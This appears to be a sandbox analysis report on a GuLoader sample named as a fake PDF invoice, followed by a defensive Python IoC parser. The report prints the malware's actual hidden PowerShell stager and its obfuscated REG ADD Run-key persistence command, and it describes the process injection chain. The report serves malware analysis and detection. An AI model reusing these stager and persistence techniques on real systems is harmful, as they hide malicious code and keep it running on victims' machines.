Analysis
- max time kernel: 121s
- max time network: 122s
- platform: windows7_x64
- resource: win7-20240419-en
- resource tags: arch:x64, arch:x86, image:win7-20240419-en, locale:en-us, os:windows7-x64, system
- submitted: 02-07-2024 05:38
Static task: static1
Behavioral task: behavioral1
  Sample: Vyuctovani_2024_07-1206812497·pdf.exe
  Resource: win7-20240419-en
Behavioral task: behavioral2
  Sample: Vyuctovani_2024_07-1206812497·pdf.exe
  Resource: win10v2004-20240611-en
General
- Target: Vyuctovani_2024_07-1206812497·pdf.exe (the character before "pdf" is a middle dot, U+00B7, not a period: the file has a single real extension, .exe, and the name only imitates a PDF invoice)
- Size: 892KB
- MD5: 3fb7cb8d7fd9efd2bc0cae35eb42c4fe
- SHA1: ce06ab538757edb9b1d4cce656006da0d3795bb1
- SHA256: 705d13694a98f8bbe7624d27646e60af6586e1598fcca6464414ded3ae43d1f5
- SHA512: 97bbe6ba4c9cd15466cce57a762b537df55224329a354f119c7ea1af9f554888ba7c477027c83dc62b39b9d74d4ac11fb97fa206eea86c24a515a2f7a399a694
- SSDEEP: 24576:JOreqxsYYU8rG98siSVrcQ8EO0fG5vq7He:JOCgLY69PRxfyq7+
Malware Config
Signatures
- GuLoader (also tracked as CloudEyE): a shellcode-based downloader first seen in 2020.
- Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC): runs PowerShell with the display window hidden (-windowstyle hidden).
- Loads dropped DLL (2 IoCs)
  Processes: PID 660 powershell.exe; PID 844 Nubilum.exe
- Adds Run key to start application (2 TTPs, 1 IoC)
  Process: reg.exe
  Set value (str) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\husmndenes = "%tomboyism% -windowstyle minimized $Eftertaklede=(Get-ItemProperty -Path 'HKCU:\\Bukkespringenes\\').Hovedstads;%tomboyism% ($Eftertaklede)"
  The REG ADD command in the process tree requests type REG_EXPAND_SZ, so %tomboyism% is expanded when the value is read at logon; the variable's content is not shown in this report.
- Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
- Suspicious use of NtCreateThreadExHideFromDebugger (2 IoCs)
  Processes: PID 844 Nubilum.exe (2 events)
- Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  Processes: PID 660 powershell.exe; PID 844 Nubilum.exe
- Suspicious use of SetThreadContext (1 IoC)
  PID 660 powershell.exe set the thread context of PID 844 Nubilum.exe. Together with the six WriteProcessMemory events from 660 into 844 and the MapViewOfSection event in 660 listed below, this is consistent with the PowerShell stage writing its payload into the freshly started Nubilum.exe and redirecting its execution, rather than that copy running its own code.
- Enumerates physical storage devices (1 TTP): attempts to interact with connected storage/optical drive(s).
- Modifies registry key (1 TTP, 1 IoC)
- Suspicious behavior: EnumeratesProcesses (8 IoCs)
  Processes: PID 660 powershell.exe (8 events)
- Suspicious behavior: MapViewOfSection (1 IoC)
  Processes: PID 660 powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  PID 660 powershell.exe, Token: SeDebugPrivilege
- Suspicious use of WriteProcessMemory (18 IoCs)
  Processes (source PID wrote to memory of target PID; repeated events counted):
  - PID 1200 Vyuctovani_2024_07-1206812497·pdf.exe -> PID 660 powershell.exe (4 events)
  - PID 660 powershell.exe -> PID 844 Nubilum.exe (6 events)
  - PID 844 Nubilum.exe -> PID 1196 cmd.exe (4 events)
  - PID 1196 cmd.exe -> PID 2468 reg.exe (4 events)
Processes (PIDs taken from the signature sections above; indentation is parent/child depth)
- C:\Users\Admin\AppData\Local\Temp\Vyuctovani_2024_07-1206812497·pdf.exe (PID 1200)
  "C:\Users\Admin\AppData\Local\Temp\Vyuctovani_2024_07-1206812497·pdf.exe"
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 660, 32-bit PowerShell on the x64 host)
    "powershell.exe" -windowstyle hidden "$Repowered144=Get-Content 'C:\Users\Admin\AppData\Local\twinsomeness\Telefonsvarer\Svenskheds.Gre28';$Thiohydrate=$Repowered144.SubString(6682,3);.$Thiohydrate($Repowered144)"
    The command reads the 71KB dropped file Svenskheds.Gre28, takes the three characters at offset 6682 of its content as a command name, and invokes that command with the call operator (.) on the whole file content. The command that actually executes is therefore not present on the command line; it has to be recovered from the dropped file.
    - Command and Scripting Interpreter: PowerShell
    - Loads dropped DLL
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Users\Admin\AppData\Local\Temp\Nubilum.exe (PID 844)
      "C:\Users\Admin\AppData\Local\Temp\Nubilum.exe"
      - Loads dropped DLL
      - Suspicious use of NtCreateThreadExHideFromDebugger
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\cmd.exe (PID 1196)
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "husmndenes" /t REG_EXPAND_SZ /d "%tomboyism% -windowstyle minimized $Eftertaklede=(Get-ItemProperty -Path 'HKCU:\Bukkespringenes\').Hovedstads;%tomboyism% ($Eftertaklede)"
        - Suspicious use of WriteProcessMemory
        - C:\Windows\SysWOW64\reg.exe (PID 2468)
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "husmndenes" /t REG_EXPAND_SZ /d "%tomboyism% -windowstyle minimized $Eftertaklede=(Get-ItemProperty -Path 'HKCU:\Bukkespringenes\').Hovedstads;%tomboyism% ($Eftertaklede)"
          Persistence: a Run value of type REG_EXPAND_SZ whose data begins with %tomboyism%, an environment variable the sample must have set elsewhere (its value does not appear in this report). At logon the variable is expanded and run, minimized, with a script that reads the Hovedstads value under HKCU\Bukkespringenes and passes its content as an argument to a second invocation of %tomboyism%. Neither the interpreter nor the next stage is visible in the Run value itself, so hunting only for "powershell" in Run values misses it.
          - Adds Run key to start application
          - Modifies registry key
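The two command lines in the process tree carry the whole technique: a stager whose real command name lives in a dropped file, and a Run value that hides both the interpreter and the next stage behind an environment variable and a registry value. The following Python helper is an added example for this page, not part of the sandbox output or of the sample; it parses copies of those two command lines (taken verbatim from the Processes section, PIDs 660 and 2468) into structured indicators and prints the conclusions an analyst would write down. The function names and the KNOWN_ENV_VARS allow-list are this example's own choices, not anything from the report.

```python
"""Pull structured IoCs out of the two command lines in this report.

Added example for this page, not part of the sandbox output or of the sample.
The two command lines are copied verbatim from the Processes section (PID 660
and PID 2468); the function names and the KNOWN_ENV_VARS allow-list are this
example's own choices.
"""
import re

# Copied from the report: the PowerShell stager (PID 660).
STAGER_CMDLINE = (
    '"powershell.exe" -windowstyle hidden "$Repowered144=Get-Content '
    "'C:\\Users\\Admin\\AppData\\Local\\twinsomeness\\Telefonsvarer\\Svenskheds.Gre28';"
    '$Thiohydrate=$Repowered144.SubString(6682,3);.$Thiohydrate($Repowered144)"'
)

# Copied from the report: the persistence command run by reg.exe (PID 2468).
PERSIST_CMDLINE = (
    'REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /f /v "husmndenes" '
    '/t REG_EXPAND_SZ /d "%tomboyism% -windowstyle minimized '
    "$Eftertaklede=(Get-ItemProperty -Path 'HKCU:\\Bukkespringenes\\').Hovedstads;"
    '%tomboyism% ($Eftertaklede)"'
)

# Variables a Run value may plausibly reference (example allow-list, lower-case).
KNOWN_ENV_VARS = {
    "systemroot", "windir", "programfiles", "programfiles(x86)", "programdata",
    "appdata", "localappdata", "userprofile", "temp", "tmp", "public",
    "systemdrive", "comspec",
}


def parse_stager(cmdline):
    """Return the file read by Get-Content, the SubString(offset, length) slice
    that becomes the command name, and whether that name is invoked indirectly."""
    path = re.search(r"Get-Content\s+'([^']+)'", cmdline)
    piece = re.search(r"\.SubString\((\d+),\s*(\d+)\)", cmdline)
    return {
        "script_path": path.group(1) if path else None,
        "token_offset": int(piece.group(1)) if piece else None,
        "token_length": int(piece.group(2)) if piece else None,
        "hidden_window": re.search(r"-windowstyle\s+hidden", cmdline, re.I) is not None,
        # ".$name(" or "&$name(": the call operator applied to a variable, so the
        # command that actually runs is not visible on the command line.
        "indirect_invocation": re.search(r"[.&]\$\w+\s*\(", cmdline) is not None,
    }


def parse_run_persistence(cmdline):
    """Return key, value name, type, data and the two indirections in the data:
    environment variables that get expanded, and a registry value read at run time."""
    m = re.search(
        r'REG\s+ADD\s+(\S+)\s.*?/v\s+"([^"]+)"\s+/t\s+(\S+)\s+/d\s+"(.*)"\s*$',
        cmdline, re.I | re.S,
    )
    if m is None:
        return None
    key, name, vtype, data = m.groups()
    env_vars = sorted({v.lower() for v in re.findall(r"%([^%\s]+)%", data)})
    stage = re.search(r"Get-ItemProperty\s+-Path\s+'([^']+)'\)\.(\w+)", data)
    return {
        "key": key,
        "value_name": name,
        "value_type": vtype.upper(),
        "data": data,
        "env_vars": env_vars,
        "unknown_env_vars": [v for v in env_vars if v not in KNOWN_ENV_VARS],
        "stage_key": stage.group(1) if stage else None,
        "stage_property": stage.group(2) if stage else None,
    }


def findings(stager, persist):
    """Analyst-readable conclusions drawn from the parsed fields."""
    out = []
    if stager["indirect_invocation"] and stager["script_path"]:
        out.append(
            f"stager reads its command name from {stager['script_path']} at offset "
            f"{stager['token_offset']} ({stager['token_length']} chars); slice those bytes "
            "from the dropped file to learn which command runs"
        )
    if persist and persist["value_type"] == "REG_EXPAND_SZ" and persist["unknown_env_vars"]:
        vars_ = ", ".join(f"%{v}%" for v in persist["unknown_env_vars"])
        out.append(f"Run value {persist['value_name']} expands non-standard variable(s) "
                   f"{vars_}; the interpreter it launches lives in the environment, not "
                   "in the registry value")
    if persist and persist["stage_key"]:
        out.append(f"next stage is read from registry {persist['stage_key']} value "
                   f"{persist['stage_property']} and passed to the expanded variable")
    return out


if __name__ == "__main__":
    for line in findings(parse_stager(STAGER_CMDLINE), parse_run_persistence(PERSIST_CMDLINE)):
        print("-", line)
```

With the dropped Svenskheds.Gre28 file in hand, the recovered offset and length are all that is needed to read the command name (the three characters at offset 6682 of the file's text), and the same two parsers can be run over Run values and PowerShell command lines collected from an estate to surface the same pattern: a REG_EXPAND_SZ Run value referencing a variable outside the allow-list, or a call operator applied to a variable whose content comes from a file.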
Network
MITRE ATT&CK Matrix (ATT&CK v13)
Downloads
- C:\Users\Admin\AppData\Local\twinsomeness\Nyde.Hal
  Filesize: 314KB
  MD5: 7ff3d5bfd31d06f172660bc9457c8bdf
  SHA1: 9d84f647eab98d98e4c9f77e3bc29ca213063ac7
  SHA256: a44b7bed6111afa49d3955e6a7e267f090fbfc78fdb766cb882c41af59af8e99
  SHA512: 2b9b4c5abf7f6270903a0456dd596a7051be854886951719de7b625aae0f30651685d2cb8e0fa78c8977bae181e642fbf7381673f7701424ff7a19170ed806a2
- C:\Users\Admin\AppData\Local\twinsomeness\Telefonsvarer\Svenskheds.Gre28 (the file read by the PowerShell stage, PID 660)
  Filesize: 71KB
  MD5: a722a8ee65ce2bf5d2fbd7450d8fe960
  SHA1: 2992f4b10c0e3d771862c5204b9b304ec2e50634
  SHA256: feb62e067d0cd459bc5c93ac7dcb76062257d26d8fb47e9b9e9f9d94c6706ae3
  SHA512: 0052efd489bba988c6147bfcc5acb6fccd81ff5a54f9b75c98dd69426c5d1a99513d89f17942d6606cb8786515ff3a35c7c862b7db8f3a12b1ecba63a9df8db9
- \Users\Admin\AppData\Local\Temp\Nubilum.exe (same size and hashes as the submitted sample, i.e. a byte-identical copy of the loader)
  Filesize: 892KB
  MD5: 3fb7cb8d7fd9efd2bc0cae35eb42c4fe
  SHA1: ce06ab538757edb9b1d4cce656006da0d3795bb1
  SHA256: 705d13694a98f8bbe7624d27646e60af6586e1598fcca6464414ded3ae43d1f5
  SHA512: 97bbe6ba4c9cd15466cce57a762b537df55224329a354f119c7ea1af9f554888ba7c477027c83dc62b39b9d74d4ac11fb97fa206eea86c24a515a2f7a399a694
- memory/660-18-0x0000000073A90000-0x000000007403B000-memory.dmp: Filesize 5.7MB
- memory/660-15-0x0000000073A90000-0x000000007403B000-memory.dmp: Filesize 5.7MB
- memory/660-13-0x0000000073A90000-0x000000007403B000-memory.dmp: Filesize 5.7MB
- memory/660-11-0x0000000073A91000-0x0000000073A92000-memory.dmp: Filesize 4KB
- memory/660-14-0x0000000073A90000-0x000000007403B000-memory.dmp: Filesize 5.7MB
- memory/660-20-0x0000000073A90000-0x000000007403B000-memory.dmp: Filesize 5.7MB
- memory/660-21-0x0000000006740000-0x0000000007224000-memory.dmp: Filesize 10.9MB
- memory/660-12-0x0000000073A90000-0x000000007403B000-memory.dmp: Filesize 5.7MB
- memory/660-26-0x0000000073A90000-0x000000007403B000-memory.dmp: Filesize 5.7MB
- memory/844-33-0x0000000000840000-0x00000000018A2000-memory.dmp: Filesize 16.4MB
- memory/844-49-0x00000000018B0000-0x0000000002394000-memory.dmp: Filesize 10.9MB